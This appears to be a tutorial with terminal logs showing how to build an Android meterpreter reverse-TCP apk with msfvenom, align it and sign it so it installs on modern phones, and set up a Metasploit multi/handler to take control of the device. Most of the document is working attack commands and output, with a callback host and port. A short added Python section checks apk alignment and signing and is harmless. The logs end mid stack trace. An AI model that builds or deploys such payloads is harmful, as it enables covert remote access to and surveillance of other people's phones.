1. Use msfvenom to generate an Android apk preset to connect back to the Kali host.
lhost=192.168.183.12 (this is Kali's IP); lport=55555 (the default is 4444, you can choose your own)
msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.183.12 lport=55555 R > t.apk
That is all it takes: a very simple Android app carrying the payload has been generated. Run ls -l and you will see a t.apk file in the current directory.
Many readers follow tutorials found on Baidu that stop right here, push the file onto an Android phone, install it, and then it never connects... Those are ancient tutorials, and nobody around us still has phones that old. Here we still have to align and then sign t.apk.
Three tools are needed: zipalign, keytool, apksigner.
Kali 2020 only ships keytool by default. Some tutorials mention jarsigner, but Kali 2020 no longer has it, it is not in the package repositories, and apt-get install jarsigner reports that no such package exists. jarsigner is the tool for apk V1 signing. I use apksigner's V2 signing here; the V1 and V2 signing flows differ, so do not copy steps from one into the other.
If you want to understand this part, search Baidu for zipalign.
2. Align the apk with zipalign
zipalign -v 4 t.apk tz.apk
3. Generate a key pair:
keytool -genkey -v -keystore cg.keystore -alias cg -keyalg RSA -keysize 2048 -validity 10000
Explanation: keytool -genkeypair -keystore <keystore name> -alias <key alias> -validity <days> -keyalg RSA
4. Sign the apk:
apksigner sign --ks cg.keystore --ks-key-alias cg tz.apk
Explanation: apksigner sign --ks <keystore name> --ks-key-alias <key alias> tz.apk
5. Verify the apk signature:
apksigner verify -v --print-certs tz.apk
At this point you are basically done. The final file, tz.apk, is the Android app we wanted.
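The two properties the zipalign and apksigner steps above are meant to produce (4-byte alignment of uncompressed entries, and an APK Signature Scheme v2 block in front of the ZIP central directory) can be checked from the file structure alone, which is handy when triaging an apk on a host without the Android SDK. This is an added example, not code from the original post; the sample archives and the dummy signing block it builds are constructed fixtures (the block holds a placeholder value, not a real signature).

```python
import io
import struct
import zipfile
SIG_BLOCK_MAGIC = b"APK Sig Block 42"  # trailing magic of an APK Signature Scheme v2 block

def stored_entry_data_offsets(apk):
    """(name, data offset) of each STORED entry, computed as zipalign does: header + 30 + name + extra."""
    out = []
    with zipfile.ZipFile(io.BytesIO(apk)) as zf:
        for info in zf.infolist():
            if info.compress_type != zipfile.ZIP_STORED:
                continue
            hdr = apk[info.header_offset:info.header_offset + 30]  # 30-byte fixed local file header
            name_len, extra_len = struct.unpack("<26xHH", hdr)  # name/extra lengths at bytes 26..29
            out.append((info.filename, info.header_offset + 30 + name_len + extra_len))
    return out

def misaligned_entries(apk, alignment=4):
    """Uncompressed entries whose data does not start on an `alignment`-byte boundary."""
    return [name for name, off in stored_entry_data_offsets(apk) if off % alignment]

def central_directory_offset(apk):
    """Return (central directory offset, EOCD record position) read from the EOCD record."""
    eocd = apk.rfind(b"PK\x05\x06")
    if eocd < 0:
        raise ValueError("no end-of-central-directory record")
    return struct.unpack_from("<I", apk, eocd + 16)[0], eocd

def has_v2_signing_block(apk):
    """True when the 16 bytes immediately before the central directory are the v2 block magic."""
    cd_off = central_directory_offset(apk)[0]
    return cd_off >= 16 and apk[cd_off - 16:cd_off] == SIG_BLOCK_MAGIC

def build_sample_zip(entries):  # constructed fixture: a STORED-only zip standing in for an unsigned apk
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()

def with_dummy_signing_block(apk):
    """Constructed fixture: splice a v2-shaped block (placeholder value, not a signature) before the CD."""
    cd_off, eocd = central_directory_offset(apk)
    pair = struct.pack("<QI", 4 + 4, 0x7109871A) + b"\xAA" * 4  # pair length, v2 block ID, value
    size = len(pair) + 8 + 16                                  # pairs + trailing size + magic
    block = struct.pack("<Q", size) + pair + struct.pack("<Q", size) + SIG_BLOCK_MAGIC
    patched = bytearray(apk[:cd_off] + block + apk[cd_off:])
    struct.pack_into("<I", patched, eocd + len(block) + 16, cd_off + len(block))  # fix EOCD CD offset
    return bytes(patched)
```

On a real apk, `misaligned_entries(open("tz.apk", "rb").read())` should return an empty list after zipalign, and `has_v2_signing_block` should be True after apksigner; the Python zipfile module parses signed apks because the signer patches the EOCD offset exactly as the fixture does.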
Android control (full session)

root@kali:~# msfconsole
msf5 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (android/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  55555            yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf5 exploit(multi/handler) > set lhost 192.168.183.12
lhost => 192.168.183.12
msf5 exploit(multi/handler) > exploit

[-] Handler failed to bind to 192.168.183.12:55555:-  -
[*] Started reverse TCP handler on 0.0.0.0:4444
apk generation stage (full session)

Note that in this session zipalign and apksigner were installed on first use but the commands were not run again afterwards, so tz.apk was never written and the final verify fails with FileNotFoundException.

┌──(root㉿kali)-[/home/kali/Desktop]
└─# msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.183.12 lport=55555 R > t.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
No encoder specified, outputting raw payload
Payload size: 10190 bytes

┌──(root㉿kali)-[/home/kali/Desktop]
└─# zipalign -v 4 t.apk tz.apk
Command 'zipalign' not found, but can be installed with:
apt install zipalign
Do you want to install it? (N/y)y
apt install zipalign
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
The following additional packages will be installed:
  android-libbacktrace android-libbase android-libcutils android-liblog android-libunwind android-libutils android-libziparchive libzopfli1
The following NEW packages will be installed:
  android-libbacktrace android-libbase android-libcutils android-liblog android-libunwind android-libutils android-libziparchive libzopfli1 zipalign
0 upgraded, 9 newly installed, 0 to remove and 567 not upgraded.
Need to get 548 kB of archives.
After this operation, 1,726 kB of additional disk space will be used.
Do you want to continue? [Y/n] y
Get:1 http://mirrors.ustc.edu.cn/kali kali-rolling/main amd64 android-liblog amd64 1:10.0.0+r36-7 [44.4 kB]
Get:2 http://mirrors.ustc.edu.cn/kali kali-rolling/main amd64 android-libbase amd64 1:10.0.0+r36-7 [41.5 kB]
Get:3 http://mirrors.ustc.edu.cn/kali kali-rolling/main amd64 android-libunwind amd64 10.0.0+r36-4 [48.3 kB]
Get:4 http://mirrors.ustc.edu.cn/kali kali-rolling/main amd64 android-libbacktrace amd64 1:10.0.0+r36-7 [153 kB]
Get:5 http://mirrors.ustc.edu.cn/kali kali-rolling/main amd64 android-libcutils amd64 1:10.0.0+r36-7 [33.3 kB]
Get:6 http://mirrors.ustc.edu.cn/kali kali-rolling/main amd64 android-libutils amd64 1:10.0.0+r36-7 [62.4 kB]
Get:7 http://mirrors.ustc.edu.cn/kali kali-rolling/main amd64 android-libziparchive amd64 1:10.0.0+r36-7 [35.5 kB]
Get:8 http://mirrors.ustc.edu.cn/kali kali-rolling/main amd64 libzopfli1 amd64 1.0.3-1 [101 kB]
Get:9 http://mirrors.ustc.edu.cn/kali kali-rolling/main amd64 zipalign amd64 1:10.0.0+r36-1 [28.2 kB]
Fetched 548 kB in 1s (449 kB/s)
Selecting previously unselected package android-liblog.
(Reading database ... 268182 files and directories currently installed.)
Preparing to unpack .../0-android-liblog_1%3a10.0.0+r36-7_amd64.deb ...
Unpacking android-liblog (1:10.0.0+r36-7) ...
Selecting previously unselected package android-libbase.
Preparing to unpack .../1-android-libbase_1%3a10.0.0+r36-7_amd64.deb ...
Unpacking android-libbase (1:10.0.0+r36-7) ...
Selecting previously unselected package android-libunwind.
Preparing to unpack .../2-android-libunwind_10.0.0+r36-4_amd64.deb ...
Unpacking android-libunwind (10.0.0+r36-4) ...
Selecting previously unselected package android-libbacktrace.
Preparing to unpack .../3-android-libbacktrace_1%3a10.0.0+r36-7_amd64.deb ...
Unpacking android-libbacktrace (1:10.0.0+r36-7) ...
Selecting previously unselected package android-libcutils.
Preparing to unpack .../4-android-libcutils_1%3a10.0.0+r36-7_amd64.deb ...
Unpacking android-libcutils (1:10.0.0+r36-7) ...
Selecting previously unselected package android-libutils.
Preparing to unpack .../5-android-libutils_1%3a10.0.0+r36-7_amd64.deb ...
Unpacking android-libutils (1:10.0.0+r36-7) ...
Selecting previously unselected package android-libziparchive.
Preparing to unpack .../6-android-libziparchive_1%3a10.0.0+r36-7_amd64.deb ...
Unpacking android-libziparchive (1:10.0.0+r36-7) ...
Selecting previously unselected package libzopfli1.
Preparing to unpack .../7-libzopfli1_1.0.3-1_amd64.deb ...
Unpacking libzopfli1 (1.0.3-1) ...
Selecting previously unselected package zipalign.
Preparing to unpack .../8-zipalign_1%3a10.0.0+r36-1_amd64.deb ...
Unpacking zipalign (1:10.0.0+r36-1) ...
Setting up android-liblog (1:10.0.0+r36-7) ...
Setting up libzopfli1 (1.0.3-1) ...
Setting up android-libunwind (10.0.0+r36-4) ...
Setting up android-libbase (1:10.0.0+r36-7) ...
Setting up android-libziparchive (1:10.0.0+r36-7) ...
Setting up android-libcutils (1:10.0.0+r36-7) ...
Setting up android-libbacktrace (1:10.0.0+r36-7) ...
Setting up android-libutils (1:10.0.0+r36-7) ...
Setting up zipalign (1:10.0.0+r36-1) ...
Processing triggers for libc-bin (2.32-4) ...
Processing triggers for man-db (2.9.4-2) ...
Processing triggers for kali-menu (2021.4.2) ...

┌──(root㉿kali)-[/home/kali/Desktop]
└─# keytool -genkey -v -keystore cg.keystore -alias cg -keyalg RSA -keysize 2048 -validity 10000
Enter keystore password:
Re-enter new password:
What is your first and last name?
  [Unknown]:  jackson
What is the name of your organizational unit?
  [Unknown]:  jackson
What is the name of your organization?
  [Unknown]:  jackson
What is the name of your City or Locality?
  [Unknown]:  jackson
What is the name of your State or Province?
  [Unknown]:  jackson
What is the two-letter country code for this unit?
  [Unknown]:  22
Is CN=jackson, OU=jackson, O=jackson, L=jackson, ST=jackson, C=22 correct?
  [no]:  y
Generating 2,048 bit RSA key pair and self-signed certificate (SHA256withRSA) with a validity of 10,000 days
	for: CN=jackson, OU=jackson, O=jackson, L=jackson, ST=jackson, C=22
[Storing cg.keystore]

┌──(root㉿kali)-[/home/kali/Desktop]
└─# apksigner sign --ks cg.keystore --ks-key-alias cg tz.apk
Command 'apksigner' not found, but can be installed with:
apt install apksigner
Do you want to install it? (N/y)y
apt install apksigner
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
The following additional packages will be installed:
  libapksig-java
The following NEW packages will be installed:
  apksigner libapksig-java
0 upgraded, 2 newly installed, 0 to remove and 567 not upgraded.
Need to get 847 kB of archives.
After this operation, 980 kB of additional disk space will be used.
Do you want to continue? [Y/n] y
Get:1 http://mirrors.ustc.edu.cn/kali kali-rolling/main amd64 libapksig-java all 31.0.2-1 [404 kB]
Get:2 http://mirrors.ustc.edu.cn/kali kali-rolling/main amd64 apksigner all 31.0.2-1 [443 kB]
Fetched 847 kB in 1s (1,115 kB/s)
Selecting previously unselected package libapksig-java.
(Reading database ... 268245 files and directories currently installed.)
Preparing to unpack .../libapksig-java_31.0.2-1_all.deb ...
Unpacking libapksig-java (31.0.2-1) ...
Selecting previously unselected package apksigner.
Preparing to unpack .../apksigner_31.0.2-1_all.deb ...
Unpacking apksigner (31.0.2-1) ...
Setting up libapksig-java (31.0.2-1) ...
Setting up apksigner (31.0.2-1) ...
Processing triggers for kali-menu (2021.4.2) ...
Processing triggers for man-db (2.9.4-2) ...

┌──(root㉿kali)-[/home/kali/Desktop]
└─# apksigner verify -v --print-certs tz.apk                                                   127 ⨯
Exception in thread "main" java.io.FileNotFoundException: tz.apk (No such file or directory)
	at java.base/java.io.RandomAccessFile.open0(Native Method)
	at java.base/java.io.RandomAccessFile.open(RandomAccessFile.java:345)
	at java.base/java.io.RandomAccessFile.